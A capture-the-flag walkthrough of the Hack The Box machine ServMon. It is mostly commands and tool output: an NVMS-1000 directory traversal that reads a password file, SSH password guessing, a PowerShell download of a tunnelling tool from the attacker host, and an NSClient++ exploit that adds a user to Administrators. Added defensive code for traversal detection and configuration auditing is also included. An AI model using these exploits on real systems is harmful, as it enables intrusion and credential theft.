Disclaimer

The hosts penetrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and penetration ideas in this article for any illegal purpose. I am not responsible for any consequences arising from them, nor for any misuse or damage caused.

Service detection

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# nmap -sV -Pn 10.10.10.184 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-06 04:37 EST
Nmap scan report for 10.10.10.184
Host is up (0.34s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp    open  http
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
```

Many services are running: FTP, SSH, HTTP, SMB, and so on.

Port 80 shows the login page of an NVMS; the login credentials are unknown.

Testing shows that FTP allows anonymous access, so start with FTP.

FTP anonymous login

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# ftp 10.10.10.184
Connected to 10.10.10.184.
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:05AM       <DIR>          Users
226 Transfer complete.
ftp> cd Uswes
550 The system cannot find the file specified.
ftp> cd Users
250 CWD command successful.
ftp> ls -alh
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:06AM       <DIR>          Nadine
01-18-20  11:08AM       <DIR>          Nathan
```

So I go into the Users folder, then into the second-level directories, and find two user folders, Nadine and Nathan. Good, that gives me two usernames. I download Nadine/Confidential.txt and Nathan/Notes to do.txt for local analysis.

Look at these two files:

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# cat Confidential.txt
I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
Nadine

┌──(root💀kali)-[~/HTB/ServMon]
└─# cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```

It's quite CTF-style…

There may be a secure folder containing Nathan's changed password, which could be used to log in to the NVMS backend, and there is a file named Passwords.txt on Nathan's desktop.

Directory traversal

The CMS on port 80, NVMS-1000, has a directory traversal vulnerability.

I found an exploit for this vulnerability, CVE-2019-20085, on GitHub.

Try to read the Windows/system.ini file:

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# ./nvms.py 10.10.10.184 Windows/system.ini win.ini
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
++++++++++ END ++++++++++
```

The read succeeded. Now read Passwords.txt on Nathan's desktop:

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# ./nvms.py 10.10.10.184 Users/Nathan/Desktop/Passwords.txt Passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
```
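The defect behind a traversal like the one above is a file path built by joining client input onto the web root without confining the result. The following is an added example, not code from NVMS-1000 or from the exploit script: it shows the unchecked join, a hardened resolver that decodes, normalises and rejects anything outside the root, and a scan of constructed request-log lines with that resolver. `WEB_ROOT`, the log format and the sample lines are assumptions.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/nvms/www"  # constructed web root, not the real product layout

def resolve_vulnerable(requested: str) -> str:
    """Naive join: '../' segments in the client path walk out of WEB_ROOT."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))

def resolve_hardened(requested: str):
    """Decode, unify separators, normalise, then refuse anything outside WEB_ROOT.
    Returns the confined absolute path, or None when the request is rejected."""
    decoded = unquote(unquote(requested))        # second pass catches %252e double encoding
    if "\x00" in decoded:                         # NUL truncation tricks
        return None
    unified = decoded.replace("\\", "/")          # Windows servers treat '..\' like '../'
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, unified.lstrip("/")))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

def scan_requests(log_lines):
    """Flag request lines whose path would escape the web root.
    Constructed format: '<client-ip> <METHOD> <path> <status>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, method, path, status = parts[:4]
        if resolve_hardened(path) is None:
            hits.append((client, path, status))
    return hits

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = [
    "10.10.14.16 GET /index.html 200",
    "10.10.14.16 GET /../../../../../Windows/win.ini 200",
    "10.10.14.16 GET /..%5c..%5cUsers/Nathan/Desktop/Passwords.txt 200",
    "10.10.14.16 GET /%252e%252e/%252e%252e/Windows/system.ini 200",
    "10.10.14.16 GET /css/style.css 200",
]

if __name__ == "__main__":
    for client, path, status in scan_requests(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path} -> HTTP {status}")
```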

Now we have a list of passwords, and according to the hint found via FTP, one of them is Nathan's password.

I tried to log in to the web backend using these passwords and failed; logging in to Nathan's account with evil-winrm failed; logging in to Nadine's account with evil-winrm failed; logging in to Nathan's account over SSH failed. Slightly crushed.

Finally, trying them one by one over SSH as Nadine works…

The story tells us that enumeration is important.

The password is L1k3B1gBut7s@W0rk

```
ssh nadine@10.10.10.184
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine
```

Get user.txt from Nadine's desktop.

Privilege escalation

View all local TCP connections:

```
PS C:\Users\Nadine> netstat -ano | findstr TCP
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2600
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       2728
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5448
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5060
  TCP    0.0.0.0:5666           0.0.0.0:0              LISTENING       2708
  TCP    0.0.0.0:6063           0.0.0.0:0              LISTENING       5448
  TCP    0.0.0.0:6699           0.0.0.0:0              LISTENING       5448
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       2708
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1348
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2192
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       2424
  TCP    10.10.10.184:22        10.10.14.16:51872      ESTABLISHED     2728
  TCP    10.10.10.184:22        10.10.14.16:51886      ESTABLISHED     2728
  TCP    10.10.10.184:139       0.0.0.0:0              TIME_WAIT       0
  TCP    10.10.10.184:49704     10.10.14.16:8000       ESTABLISHED
  TCP    127.0.0.1:49674        127.0.0.1:49675        ESTABLISHED     5448
  TCP    127.0.0.1:49675        127.0.0.1:49674        ESTABLISHED     5448
  TCP    127.0.0.1:49676        127.0.0.1:49677        ESTABLISHED     5448
  TCP    127.0.0.1:49677        127.0.0.1:49676        ESTABLISHED
  TCP    [::]:21                [::]:0                 LISTENING       2600
  TCP    [::]:22                [::]:0                 LISTENING       2728
  TCP    [::]:135               [::]:0                 LISTENING       880
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5666              [::]:0                 LISTENING       2708
  TCP    [::]:49664             [::]:0                 LISTENING       632
  TCP    [::]:49665             [::]:0                 LISTENING       488
  TCP    [::]:49666             [::]:0                 LISTENING       924
  TCP    [::]:49667             [::]:0                 LISTENING       1348
  TCP    [::]:49668             [::]:0                 LISTENING       2192
  TCP    [::]:49669             [::]:0                 LISTENING       624
  TCP    [::]:49670             [::]:0                 LISTENING       2424
```

Port 8443 serves an NSClient++ page, but every login attempt returns 403 "Your not allowed".

Login is probably restricted to the local IP address.

Tunneling the service

We use Chisel to build a tunnel.

Get chisel.exe onto the target:

```
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.16:8000/chisel.exe', 'C:\temp\chisel.exe')"
```

Kali starts listening:

```
./chisel server -p 8000 --reverse
```

Windows connects back and forwards port 8443:

```
.\chisel.exe client 10.10.14.16:8000 R:8443:localhost:8443
```

Now open https://127.0.0.1:8443/ in the browser and enter a password; this time it reports 403 Invalid password.

That means we are now allowed to log in to the backend; only the password is wrong.

So what’s the password?

Click on "Forgotten password?", which shows:

```
NSClient++ password

The NSClient++ password can be found by running:

nscp web -- password --display

or you can sett a new password:

nscp web -- password --set new-password
```

So we can display the password with the --display command.

Go to C:\Program Files\NSClient++

Run nscp web -- password --display:

```
nadine@SERVMON C:\>cd C:\Program Files\NSClient++

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
```

The login password is ew2x6SsGTxjRwXOT.

Searching Google for the NSClient++ keyword, we found an exploit for remote code execution in it.

I tried a lot of reverse shell methods here, but because the target machine has antivirus, many exe files can't execute and PowerShell can't spawn a reverse shell. Worrying…

Assuming the program runs with administrator privileges, there should be no need for a reverse shell at all; it should be possible to promote the current user to administrator directly.

View the current user's group memberships (only the Users group):

```
nadine@SERVMON c:\Temp>net user nadine
User name                    Nadine
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            14/01/2020 20:36:20
Password expires             Never
Password changeable          14/01/2020 20:36:20
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   08/12/2021 14:55:43

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
```

Add Nadine to the Administrators group through the exploit:

```
┌──(root💀kali)-[~/HTB/ServMon]
└─# python3 imp.py -t 127.0.0.1 -P 8443 -p 'ew2x6SsGTxjRwXOT' -c 'cmd.exe /c net localgroup Administrators /add nadine'
[!] Targeting Base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: LnEZSwPpcJ)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
```
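The exploit output above shows the three settings that make this escalation possible: the web API answers on loopback to a local user who has recovered the password, the external scripts module can be enabled through that API, and the registered script then runs as the service account. The following is an added example, not part of the original post or of NSClient++, that audits `nsclient.ini` fragments for exactly those settings. The INI fragments are constructed, the password value is a placeholder, and the section and key names are NSClient++'s own.

```python
import configparser

# Constructed nsclient.ini fragments (not the target's real file).
WEAK_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = changeme-placeholder

[/settings/external scripts]
allow arguments = true
"""

HARDENED_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = disabled

[/settings/default]
allowed hosts = 10.0.0.5
password = changeme-placeholder

[/settings/external scripts]
allow arguments = false
"""

def _on(value):
    # NSClient++ accepts several spellings for "enabled".
    return value.strip().lower() in {"1", "true", "enabled", "yes"}

def audit(ini_text):
    """Return findings explaining why a local user could turn the agent into a privilege-escalation path."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep key case (CheckExternalScripts, WEBServer)
    cp.read_string(ini_text)
    sec = lambda name: cp[name] if cp.has_section(name) else {}
    mods, dflt, ext = sec("/modules"), sec("/settings/default"), sec("/settings/external scripts")
    hosts = [h.strip() for h in dflt.get("allowed hosts", "").split(",") if h.strip()]
    findings = []
    if _on(mods.get("WEBServer", "")) and any(h in ("127.0.0.1", "::1", "localhost") for h in hosts):
        findings.append("web API reachable from loopback: any local user who learns the password can drive it")
    if _on(mods.get("CheckExternalScripts", "")):
        findings.append("CheckExternalScripts enabled: the API can register scripts that run as the service account")
    if _on(ext.get("allow arguments", "")):
        findings.append("allow arguments = true: caller-supplied arguments reach external scripts")
    return findings
```

Restricting `allowed hosts` to the monitoring server only helps if the module and argument settings are locked down too, since a reverse tunnel like the Chisel one above still lands on 127.0.0.1.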

Check again: Nadine has been added to the Administrators group.

```
nadine@SERVMON c:\Temp>net user nadine
User name                    Nadine
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            14/01/2020 20:36:20
Password expires             Never
Password changeable          14/01/2020 20:36:20
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   08/12/2021 14:55:43

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
```

Note that the group change does not take effect in the current session: you need to exit the current SSH session and log in again.

Now we can enter the Administrator directory and see root.txt, but we still do not have permission to read it.

```
nadine@SERVMON C:\Users\Administrator>cd Desktop

nadine@SERVMON C:\Users\Administrator\Desktop>type root.txt
Access is denied.
```

Change the permissions on the root.txt file so that Nadine has full control over it:

```
nadine@SERVMON C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt /t /e /c /g nadine:F
processed file: C:\Users\Administrator\Desktop\root.txt

nadine@SERVMON C:\Users\Administrator\Desktop>type root.txt
{}
```

root.txt was read successfully.